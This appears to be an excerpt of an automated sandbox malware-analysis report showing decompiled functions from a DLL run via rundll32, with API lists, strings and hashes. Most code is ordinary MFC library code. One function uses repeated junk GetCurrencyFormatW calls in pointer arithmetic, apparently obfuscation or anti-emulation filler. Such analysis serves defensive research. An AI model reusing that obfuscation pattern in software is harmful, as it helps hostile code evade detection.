			E100056D9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10046ad4; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E10004E6E(0, _t12, _t15, _t16, _t20);
					}
					 *0x10046ac4 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10046ac8 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10046acc = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10046ac4; // 0x0
					 *0x10046ad0 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10046ac8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10046acc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10046ac8; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10046acc; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10046ad4 = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10006175,000000FF), ref: 100056FB
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10005719
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10005726
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10005733
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10005740

Strings

ActivateActCtx, xrefs: 10005728
KERNEL32, xrefs: 100056F6
DeactivateActCtx, xrefs: 10005735
ReleaseActCtx, xrefs: 1000571B
CreateActCtxA, xrefs: 10005713

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
Instruction ID: 1d76d1e4db1a962794084fd329e7408aae32bd70e769f2b2ddda66e1b27d4fc6
Opcode Fuzzy Hash: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
Instruction Fuzzy Hash: B51188B5809666DEF701EF65DEC040B7AE4E70A682705902FE108E2564E73218589F0B

Uniqueness

Uniqueness Score: -1.00%

Function 100080BA Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100080BA(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1001FBF7(E10033165, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000EC09(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000EC09(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10007BF2(_t84, _t100, __eflags);
					E1000A998(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10005CAE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1000EFB3(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1000EFCE(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1000C3CA(_t96, __eflags, _t100);
					_t58 = E1000A8F0(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10007ECA(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1000EEC4(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000A486(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1000F1A1(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1000EFCE(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10007C2C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1001FC9C(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 100080C1
FindResourceA.KERNEL32(?,?,00000005), ref: 100080F4
LoadResource.KERNEL32(?,00000000), ref: 100080FC
LockResource.KERNEL32(?,00000024,100011BE,00000000,00000120), ref: 1000810D
GetDesktopWindow.USER32 ref: 10008140
IsWindowEnabled.USER32(?), ref: 1000814E
EnableWindow.USER32(?,00000000), ref: 1000815D

Part of subcall function 1000EFB3: IsWindowEnabled.USER32(?), ref: 1000EFBC

Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB

EnableWindow.USER32(?,00000001), ref: 10008239
GetActiveWindow.USER32 ref: 10008244
SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
Instruction ID: 62cfd41f18e3cc2e1163053c16dc1e50d79b68c3982d3d37ae726430dd99fe76
Opcode Fuzzy Hash: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
Instruction Fuzzy Hash: BD517D34A007459FFB11DFA4CC85AAEBAB5FF48781F204029E582B61A6CB755A42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C033 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000C033(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E1001FBF7(E10033663, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000A8F0(1, _t60, _t71,  *(_t71 + 0x14));
					E1000BF47(_t60, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E1000BFBD(1, _t66, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000963A(E1000A8F0(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1000AEC5(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E1001FC9C( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C03A
GetPropA.USER32 ref: 1000C049
CallWindowProcA.USER32 ref: 1000C0A3

Part of subcall function 1000AEC5: GetWindowRect.USER32 ref: 1000AEED
Part of subcall function 1000AEC5: GetWindow.USER32(?,00000004), ref: 1000AF0A

SetWindowLongA.USER32 ref: 1000C0CA
RemovePropA.USER32 ref: 1000C0D2
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1000C0D9
GlobalDeleteAtom.KERNEL32(00000000), ref: 1000C0E0

Part of subcall function 1000963A: GetWindowRect.USER32 ref: 10009646

CallWindowProcA.USER32 ref: 1000C134

Strings

AfxOldWndProc423, xrefs: 1000C042, 1000C047, 1000C0D0, 1000C0D8

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
Instruction ID: dfbf0fdf7da19c16620821b7241651b8befac12ff30b1409a2a82cb4b6d679a3
Opcode Fuzzy Hash: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
Instruction Fuzzy Hash: 4F31983680021ABFEB02DFA4CD89DFF7A78EF09391F004124F501A5156DB749A51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007ECA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E10007ECA(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1001FBF7(E1003314A, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000EC09(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000EC09(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x10);
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1001FC9C(_t65);
					}
					E1000424F(_t132 - 0x1c, E1001044F());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E100123E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1004866c; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1000C3CA(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10007926, 0);
							E10001260( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000A998(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E100123AB(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E10012309(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E10012022(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E10012014(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10007EA2(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 10007ED1
GetSystemMetrics.USER32 ref: 10007F82
GlobalLock.KERNEL32 ref: 10007FEB
CreateDialogIndirectParamA.USER32(?,?,?,Function_00007926,00000000), ref: 1000801A

Strings

MS Shell Dlg, xrefs: 10007F8C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
Instruction ID: 1ea4d1b8922e6c5543e762249093f9d57ee88d3b172a0da63e9484b16312698d
Opcode Fuzzy Hash: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
Instruction Fuzzy Hash: AF51DD30D0020A9FEB11DBA4CC859EEBBB0FF44380F214568F545EB19ADB349E85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001534 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001534(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _t22;
				signed int _t45;
				void* _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr* _t64;
				void* _t73;

				_t51 = __ecx;
				_t45 = _a16 * _a20;
				_t22 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t55 = _a4;
				_a16 = E100014F4(_t51) + _t22 * (_t45 - _a12 + _t55 + _a8) *  *0x100440d4 * 0x34;
				_a12 = _t55 - _t45 - _a12 + _a8;
				_t73 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440cc * 0x24 +  *((intOrPtr*)(_a16 + 0xc));
				_t50 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440e0 +  *((intOrPtr*)(_t73 + 0xc));
				_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440d4 * 0x48 +  *((intOrPtr*)(_t73 + 0xc));
				while(E10001395( *((intOrPtr*)(_t64 + 0x30)) + GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 2, _a24) != 0) {
					_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 0x48 +  *_t64;
					if(_t64 != _t50) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t64 + 0x18));
			}

0x10001534
0x10001539
0x1000155f
0x10001561
0x10001598
0x100015a9
0x100015cc
0x100015ef
0x10001619
0x1000161c
0x10001676
0x1000167a
0x00000000
0x00000000
0x00000000
0x1000167c
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 1000155F

Part of subcall function 100014F4: GetCurrencyFormatW.KERNEL32 ref: 10001512

GetCurrencyFormatW.KERNEL32 ref: 100015B5
GetCurrencyFormatW.KERNEL32 ref: 100015DF
GetCurrencyFormatW.KERNEL32 ref: 10001606
GetCurrencyFormatW.KERNEL32 ref: 10001639
GetCurrencyFormatW.KERNEL32 ref: 10001668

Strings

xadqsavcbdfewescGADW, xrefs: 1000153E, 1000154C, 10001593, 100015D0, 100015F7, 1000162A, 10001659
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001534, 10001553, 100015A4, 100015D7, 100015FE, 10001631, 10001660

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
Instruction ID: 4961d4481171c5eb7b22e17488040c19a8d80f5034832b3bd1fa6cad81c8b5c3
Opcode Fuzzy Hash: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
Instruction Fuzzy Hash: 52319D73644215BFE204CB55CD82F86FBA9EB9A751F06401AF704BF5D1CB30A8548EA8

Uniqueness

Uniqueness Score: -1.00%

Function 10004C30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10004C30(void* __edx, void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t38;
				void* _t43;
				void* _t51;
				void* _t52;
				void* _t53;
				long* _t54;
				void* _t58;
				CHAR* _t63;
				signed int _t64;
				void* _t66;

				_t66 = __eflags;
				_t51 = __edx;
				_push(0xffffffff);
				_push(E10032E77);
				_push( *[fs:0x0]);
				_push(_t43);
				_push(_t38);
				_push(_t52);
				_t19 =  *0x10045580; // 0x2ef01728
				_push(_t19 ^ _t64);
				 *[fs:0x0] = _t64 + 0x18;
				_t58 = _t43;
				E10007D6C(_t38, _t43, _t52);
				_push(GetSystemMenu( *(_t58 + 0x20), 0));
				_t53 = E1000ED5E(0, _t43, _t52, _t58, _t66);
				if(_t53 != 0) {
					E1000424F(_t64 + 0x18, E1001044F());
					 *((intOrPtr*)(_t64 + 0x24)) = 0;
					E10004C10(_t64 + 0x18, 0x65);
					_t63 =  *(_t64 + 0x14);
					if( *((intOrPtr*)(_t63 - 0xc)) != 0) {
						AppendMenuA( *(_t53 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t53 + 4), 0, 0x10, _t63);
					}
					 *(_t64 + 0x20) =  *(_t64 + 0x20) | 0xffffffff;
					E10001260(_t63 - 0x10, _t51);
				}
				_t54 = _t58 + 0x11c;
				SendMessageA( *(_t58 + 0x20), 0x80, 1,  *_t54);
				SendMessageA( *(_t58 + 0x20), 0x80, 0,  *_t54);
				E1000EE6D(_t58, 0x3e9, "Hola Mundo");
				E1000EE6D(_t58, 0x3ea, "Hola Mundo");
				SendMessageA( *(_t58 + 0xe8), 0x143, 0, "Hola");
				 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x18));
				return 1;
			}

APIs

GetSystemMenu.USER32(?,00000000,2EF01728,?,?,?,?,?,?,10032E77,000000FF), ref: 10004C62
AppendMenuA.USER32 ref: 10004CAB
AppendMenuA.USER32 ref: 10004CB5
SendMessageA.USER32 ref: 10004CDD
SendMessageA.USER32 ref: 10004CE7
SendMessageA.USER32 ref: 10004D1A

Strings

Hola, xrefs: 10004D08
